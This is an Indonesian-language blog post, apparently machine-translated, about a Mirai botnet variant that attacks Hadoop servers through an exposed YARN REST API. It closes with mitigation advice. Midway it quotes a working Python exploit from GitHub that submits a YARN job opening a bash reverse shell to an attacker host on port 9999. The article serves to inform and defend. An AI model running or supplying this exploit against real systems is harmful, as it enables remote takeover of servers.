Kecuali IoT: Mirai botnet meluncurkan serangan pada mesin Linux

Botai Mirai muncul pada tahun 2016 dan dalam waktu singkat berhasil menginfeksi lebih dari 600 ribu perangkat IoT. Pekan lalu, diketahui tentang versi baru Mirai, yang tujuannya adalah Linux-server dengan Hadoop. Kami mencari tahu kerentanan apa yang digunakan virus dan cara "menutupinya".


/ Flickr / DJ Shin / CC BY-SA

Beberapa kata tentang Mirai

Mirai menjadi terkenal karena serangkaian serangan profil tinggi. Salah satunya ada di blog jurnalis Brian Krebs setelah menerbitkan artikel tentang penjualan botnet. Yang lain adalah pada penyedia DNS besar Dyn , yang menyebabkan kerusakan pada layanan dunia: Twitter, Reddit, PayPal, GitHub dan banyak lainnya.

Untuk "menangkap" perangkat IoT, botnet menggunakan kerentanan kata sandi yang lemah (pabrikan membuatnya sama untuk semua perangkat pintar). Malware memantau Internet untuk membuka port telnet dan secara brutal memasukkan pasangan kata sandi masuk yang dikenal untuk mengakses akun pemilik perangkat. Jika berhasil, gadget menjadi bagian dari "jaringan jahat."

Pada akhir 2016, pengembang memposting kode sumber virus ke jaringan. Hal ini menyebabkan munculnya beberapa versi perangkat lunak berbahaya, tetapi mereka semua menjadikan perangkat Internet sebagai tujuan mereka. Sampai saat ini, worm Mirai kini telah muncul, yang menyerang server Linux di pusat data.

Botnet "merekrut" Linux

Laporan tentang versi baru Mirai diterbitkan oleh spesialis keamanan informasi di NETSCOUT. Diketahui bahwa botnet menyerang server dengan kerangka kerja Apache Hadoop diinstal. Seperti yang dikatakan para pakar keamanan, peretas tertarik oleh kekuatan besi. Hadoop digunakan pada server komputasi berperforma tinggi dan algoritma pembelajaran mesin. Jaringan perangkat produktif akan memungkinkan serangan DDoS yang lebih merusak.

Versi Mirai untuk Linux masih meretas sistem dengan kredensial pabrik telnet. Tetapi sekarang program tidak perlu membedakan antara berbagai jenis arsitektur gadget IoT, Mirai hanya menyerang server dengan prosesor x86.

Pada saat yang sama, botnet baru tidak menginstal malware pada perangkat yang diretas sendiri. Worm mengirimkan penyerang alamat IP dari mesin yang rentan dan sepasang nama pengguna dan kata sandi untuk itu. Kemudian, peretas memasang bot DDoS secara manual.

Kerentanan apa yang digunakan

Malware mengeksploitasi kerentanan modul YARN, yang bertanggung jawab untuk mengelola sumber daya gugus dan tugas penjadwalan di Apache Hadoop, untuk menyusup ke server.

Jika konfigurasi BENANG tidak benar, penyerang dapat memperoleh akses ke REST API internal sistem melalui port 8088 dan 8090. Dengan menghubungkan dari jarak jauh, penyerang dapat menambahkan aplikasi baru ke cluster. Ngomong-ngomong, masalah ini telah diketahui selama beberapa tahun - eksploitasi PoC telah dipublikasikan di ExploitDB dan GitHub .

Misalnya, kode exploit berikut ini disajikan pada GitHub:

#!/usr/bin/env python import requests target = 'http://127.0.0.1:8088/' lhost = '192.168.0.1' # put your local host ip here, and listen at port 9999 url = target + 'ws/v1/cluster/apps/new-application' resp = requests.post(url) app_id = resp.json()['application-id'] url = target + 'ws/v1/cluster/apps' data = { 'application-id': app_id, 'application-name': 'get-shell', 'am-container-spec': { 'commands': { 'command': '/bin/bash -i >& /dev/tcp/%s/9999 0>&1' % lhost, }, }, 'application-type': 'YARN', } requests.post(url, json=data) 

Selain Mirai, kerentanan ini digunakan oleh bot DDoS lain - DemonBot, yang ditemukan oleh spesialis Radware pada bulan Oktober. Sejak awal musim gugur, mereka telah mencatat lebih dari satu juta upaya peretasan melalui kerentanan YARN setiap hari.

Apa kata para ahli

Menurut para pakar keamanan informasi, sebagian besar upaya diretas di AS, Inggris, Italia, dan Jerman. Pada awal bulan, lebih dari seribu server di seluruh dunia dipengaruhi oleh kerentanan di BENANG. Ini tidak banyak, tetapi mereka semua memiliki daya komputasi yang tinggi.

Ada juga informasi bahwa kerentanan di Hadoop dapat memberi para penyerang akses ke data yang disimpan di server yang tidak aman. Sejauh ini, tidak ada kasus seperti itu yang dilaporkan, tetapi para ahli memperingatkan bahwa ini hanya masalah waktu.

Versi baru Mirai tidak menyebar cepat - setiap hari hanya ada beberapa puluh ribu upaya untuk memecahkan mesin Hadoop melalui BENANG. Selain itu, semua serangan datang dari sejumlah kecil alamat IP - tidak lebih dari empat puluh.


/ Flickr / Jelene Morris / CC BY

Perilaku penyerang seperti itu mendorong para pakar NETSCOUT untuk berpendapat bahwa virus tidak menyebar secara otomatis - para peretas secara manual memindai Internet dan menyebarkan program ke mesin-mesin yang tidak terlindungi. Ini berarti bahwa pemilik server dengan Hadoop diinstal memiliki lebih banyak waktu untuk menutup kerentanan.

Untuk melindungi dari serangan, Anda perlu mengubah pengaturan keamanan jaringan. Cukup bagi administrator untuk membatasi akses ke cluster komputasi - untuk mengonfigurasi filter IP atau sepenuhnya menutup jaringan dari pengguna dan aplikasi eksternal.

Untuk mencegah akses tidak sah ke sistem, pakar keamanan juga menyarankan untuk memperbarui Hadoop ke versi 2.x dan mengaktifkan otentikasi melalui protokol Kerberos.

---

Beberapa posting dari blog VAS Experts:

• Botnet spam melalui router - apa yang perlu Anda ketahui
• Implementasi IPv6 - FAQ untuk Penyedia Layanan Internet
• DDOS dan 5G: “pipa” lebih tebal - lebih banyak masalah

Beberapa bahan segar dari blog kami di Habré:

• Bagaimana mereka akan meluncurkan Starlink - Internet satelit dari Ilona Mask
• Untuk mengganti TCP: QUIC siap untuk implementasi [tetapi tidak siap untuk menjadi RFC]